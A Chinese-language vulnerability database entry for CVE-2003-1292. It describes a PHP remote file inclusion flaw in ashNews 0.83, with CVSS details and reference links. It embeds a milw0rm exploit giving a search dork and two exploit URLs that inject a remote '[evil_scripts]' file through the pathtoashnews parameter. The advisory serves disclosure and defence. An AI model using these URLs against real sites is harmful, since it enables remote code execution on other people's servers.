CVE-2003-1292
CVSS5.0
发布时间 :2003-12-31 00:00:00
修订时间 :2008-09-05 16:36:33
NMCOE    

[原文]PHP remote file include vulnerability in Derek Ashauer ashNews 0.83 allows remote attackers to include and execute arbitrary remote files via a URL in the pathtoashnews parameter to (1) ashnews.php and (2) ashheadlines.php.


[CNNVD]AshWebStudio AshNews远程文件列入漏洞(CNNVD-200312-249)

        Derek Ashauer ashNews 0.83版本存在PHP远程文件列入漏洞。远程攻击者借助(1)ashnews.php和(2)ashheadlines.php中pathtoashnews参数的URL执行任意远程文件。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1292
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1292
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-249
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/18248
(UNKNOWN)  BID  18248
http://www.securityfocus.com/bid/16436
(UNKNOWN)  BID  16436
http://www.securityfocus.com/archive/1/329910
(UNKNOWN)  BUGTRAQ  20030720 sorry, wrong file
http://www.milw0rm.com/exploits/1864
(UNKNOWN)  MILW0RM  1864
http://secunia.com/advisories/9331
(UNKNOWN)  SECUNIA  9331
http://forums.ashwebstudio.com/viewtopic.php?t=353&start=0
(UNKNOWN)  CONFIRM  http://forums.ashwebstudio.com/viewtopic.php?t=353&start=0
http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0980.html
(UNKNOWN)  FULLDISC  20060131 Re: ashnews Cross-Site Scripting Vulnerability
http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0979.html
(UNKNOWN)  FULLDISC  20060131 Re: ashnews Cross-Site Scripting Vulnerability
http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0969.html
(UNKNOWN)  FULLDISC  20060130 Re: ashnews Cross-Site Scripting Vulnerability

- 漏洞信息

AshWebStudio AshNews远程文件列入漏洞
中危 输入验证
2003-12-31 00:00:00 2006-06-15 00:00:00
远程  
        Derek Ashauer ashNews 0.83版本存在PHP远程文件列入漏洞。远程攻击者借助(1)ashnews.php和(2)ashheadlines.php中pathtoashnews参数的URL执行任意远程文件。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.commailto:vuldb@securityfocus.com .

- 漏洞信息 (1864)

ashNews 0.83 (pathtoashnews) Remote File Include Vulnerabilities (EDBID:1864)
php webapps
2006-06-02 Verified
0 Kacper
N/A [点击下载]
################ DEVIL TEAM THE BEST POLISH TEAM #################
#
# ashnews v0.83(pathtoashnews) - Remote File Include Vulnerabilities
# Script site: http://dev.ashwebstudio.com/
# dork: News powered by ashnews
# Find by Kacper (Rahim).
# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko, pepi
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Special greetz DragonHeart :***
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
#
##################################################################
Expl:

http://www.site.com/[ashnews_path]/ashheadlines.php?pathtoashnews=[evil_scripts]

http://www.site.com/[ashnews_path]/ashnews.php?pathtoashnews=[evil_scripts]


#Elo ;-)

# milw0rm.com [2006-06-02]
		

- 漏洞信息

22912
ashNews ashnews.php pathtoashnews Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-07-22 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue. The vendor has discontinued this product.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站